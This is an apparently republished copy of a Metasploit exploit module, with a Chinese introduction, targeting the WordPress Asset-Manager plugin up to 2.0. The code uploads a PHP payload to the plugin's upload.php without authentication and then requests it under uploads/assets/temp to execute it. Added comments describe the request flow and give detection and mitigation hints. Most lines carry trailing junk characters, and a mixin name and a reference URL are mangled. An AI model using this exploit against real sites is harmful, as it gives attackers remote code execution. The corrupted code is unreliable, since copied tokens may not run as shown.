这个模块利用 Metasploit 漏洞库中收录的、在 WordPress Asset-Manager 插件 2.0 及以下版本中发现的漏洞。该漏洞允许上传 PHP 文件:用户无需身份验证即可将文件上传到一个临时目录,从而导致任意代码执行。
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
3 Y3 F# W9 Q8 U% ^require 'msf/core'' y6 i4 w' A' w
require 'msf/core/exploit/php_exe'; C) h7 M4 `, x% o, @3 Y) G9 m
# Metasploit exploit module for the Asset-Manager <= 2.0 WordPress plugin:
# an unauthenticated file upload through the plugin's upload.php that ends in
# arbitrary PHP code execution (see 'Description' below).
# NOTE(review): this page is a mangled copy — several lines carry trailing
# noise characters and the PhpEXE mixin name below is garbled; confirm every
# token against the upstream Metasploit Framework source before relying on it.
class Metasploit3 < Msf::Exploit::Remote) H. J" S6 {6 {
Rank = ExcellentRanking. q* s- \* y* p6 U8 s, z/ j7 T
# HttpClient supplies send_request_cgi / send_request_raw, rhost, rport and target_uri.
4 L9 `8 j4 K6 \4 m+ }4 C8 _5 V+ d include Msf::Exploit::Remote::HttpClient G' z# \1 H/ e0 Q6 k& k3 v: b
# NOTE(review): mixin name garbled on this page (presumably Msf::Exploit::PhpEXE,
# which would provide get_write_exec_payload) — verify against upstream.
include Msf::Exploit:hpEXE3 F s' [: j. O- t9 t) O2 y& l
: n' _* G: M% ]3 S' Q) p, i" O
# Module metadata. The only user-facing option registered here is TARGETURI,
# the WordPress base path (default '/wordpress'); the rest is author,
# reference, payload and target information.
def initialize(info = {})$ S/ X) p/ k* q2 F
super(update_info(info,
; L% D3 R$ c6 l! y. I 'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',
6 W- d8 ^/ s! j4 K" e' M* a 'Description' => %q{
- t* n2 W- o4 |5 X( _4 V This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress+ a0 Q0 X. |+ C
plugin. By abusing the upload.php file, a malicious user can upload a file to a
3 s5 j. n. R$ j& J5 O: V; H temp directory without authentication, which results in arbitrary code execution.
( X6 P: `6 R8 ?) m9 z. o8 t; w T },6 ?+ Z, }1 T( H
'Author' =>- U, {* T( t# u6 D+ n
[& c# P6 z M" v, o* W; O) v1 B+ K
'Sammy FORGIT', # initial discovery; i6 u* _4 G$ K" E% H0 n/ N% l5 Q \
'James Fitts <fitts.james[at]gmail.com>' # metasploit module% C4 I9 Z+ ~( `) W
],
6 f. C4 u8 w. n+ o9 B& e' ` 'License' => MSF_LICENSE,( B, A2 P) z h2 {9 S
# Public advisories for the issue; the trailing URL entry was altered by the
# page that republished this module and is not an upstream reference.
'References' =>, B& f+ s5 Z: ?. h, L: u5 q
[
) ^) @7 U Y4 h$ o" v' ?2 M [ 'OSVDB', '82653' ],
( h2 n" k8 P. e, q; W [ 'BID', '53809' ],
% D& k, A! @3 @/ x3 y' R0 h [ 'EDB', '18993' ],9 Q" h8 d% p& b8 o/ E# F3 L
[ 'URL', 'http:// www.myhack58.com /' ]1 }7 z0 O: ]+ n- C
],
( T& Q! \' T& g) B# f 'Payload' =>9 r0 E/ R& r" {) e7 Q7 q
{# E! L0 ?1 I/ b8 T
# NUL is excluded because the payload travels inside a PHP source file.
'BadChars' => "\x00",
3 C8 {4 b* S( V },
- Q$ i- O0 b: e" n 'Platform' => 'php',8 I5 h) A' O' h) B/ e3 f1 a
'Arch' => ARCH_PHP,& p1 }* w0 K( _
'Targets' =>. l, j6 X+ f7 C# g4 W+ @
[
. n9 i0 o [- I [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],6 b; A/ b! n( U& n
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ], `: Q5 O: o+ s1 Z$ Q
],
7 N% R# l$ N4 m( x8 a6 M" K; d6 a 'DefaultTarget' => 0,4 O5 j2 g/ q3 p) H% c
'DisclosureDate' => 'May 26 2012')). f, U5 w7 ], @* W. V( J$ }3 k
, L* n% I% k3 r8 {( Z" q @# h( B( a- j6 P
register_options(: E# O; E D" M3 k3 o7 {6 S. b0 i+ k
[
. `0 |% k* z$ @/ t- K OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])( m- o* w/ u z8 F& d
], self.class)( @9 X4 |4 Q, z6 V
end
: b( j9 F9 b. x0 ?$ ~, J! [! k! L1 T
# Two-step flow: (1) POST a PHP file as multipart field "Filedata" to
# wp-content/plugins/asset-manager/upload.php, (2) GET the same file name back
# under wp-content/uploads/assets/temp/ so the web server executes it.
# Neither request carries any credentials, which is the root cause.
# Defender notes: that request pair (unauthenticated POST to the plugin's
# upload.php followed by a GET of a fresh .php under uploads/assets/temp/) is
# the thing to alert on; removing or upgrading the plugin and denying PHP
# execution under the uploads directory both break the chain.
- q2 E- R. a0 A def exploit6 E3 v: R. h- e( c
uri = target_uri.path" m: b1 T+ x; u& `# K
# Normalise TARGETURI so the plugin paths below can be appended directly.
uri << '/' if uri[-1,1] != '/'
+ `6 N0 R) m0 f; e peer = "#{rhost}:#{rport}"
# Random 5-letter name; it is also the marker checked for in the upload reply.
4 n8 n' j, ^/ w& i4 }9 D9 R3 u3 F6 { payload_name = "#{rand_text_alpha(5)}.php"
# :unlink_self => true — presumably the staged file deletes itself after
# running (helper comes from the PhpEXE mixin); confirm against upstream.
. q* W; l5 [) K4 N php_payload = get_write_exec_payload(:unlink_self=>true)
% M. g- L% T! Z) i7 h; d2 P7 L" r! h7 l % {2 F- K. d0 O9 H2 o {" C9 N
data = Rex::MIME::Message.new
8 @, f& G% P- [, m data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")* y# x: \7 ^6 P8 ~8 f" l5 w4 u
# Strip the CRLF Rex emits before the first part boundary.
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
5 i6 f; k5 R7 Y2 a2 J* ~ . m. f1 B$ t( X* h7 k% K
print_status("#{peer} - Uploading payload #{payload_name}")$ F$ H- ]! S4 M$ `! G& k
res = send_request_cgi({
- c# Y" j2 L: k& k5 b; } 'method' => 'POST',
7 o5 I5 b1 `4 [$ j% H/ I; f) T% h, P 'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",
4 E8 h3 P8 [ [* t/ A 'ctype' => "multipart/form-data; boundary=#{data.bound}", C7 D1 j7 U5 Z; T, f8 P) P N
'data' => post_data/ H1 a0 K2 M8 c$ H% F% V" |" g
})2 O; V* {- F6 k5 |
# Success signal: HTTP 200 and the generated file name echoed in the body.
% n! R& Q/ n& J7 S# x if not res or res.code != 200 or res.body !~ /#{payload_name}/' J0 @2 T# K+ L+ l E/ [" ]
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
9 F' K1 |+ e9 G* j% \! rend$ |6 p3 w, @) Y, _9 D
6 [' `; k2 c3 D4 O/ t
print_status("#{peer} - Executing payload #{payload_name}")
. j; D6 s" a" t$ {5 ]# U# a res = send_request_raw({
+ E$ l x5 ~6 S2 S! C/ o4 d 'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",1 Q7 @& U$ m/ s. y0 a9 [+ P6 T
'method' => 'GET'
$ {/ h2 g/ [- q })
: n! V$ f- y a. c5 |
# NOTE(review): only a non-200 reply is treated as failure here; a nil res
# (no reply at all) falls through silently, unlike the upload check above.
$ i/ m. b2 x. a& a if res and res.code != 200# q6 V9 l% ?7 S
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")0 Z# H( F- U Y& ` l
end
, z1 ]4 e4 W/ b; O end+ r& f( r' H, m7 A' b: E' x o
end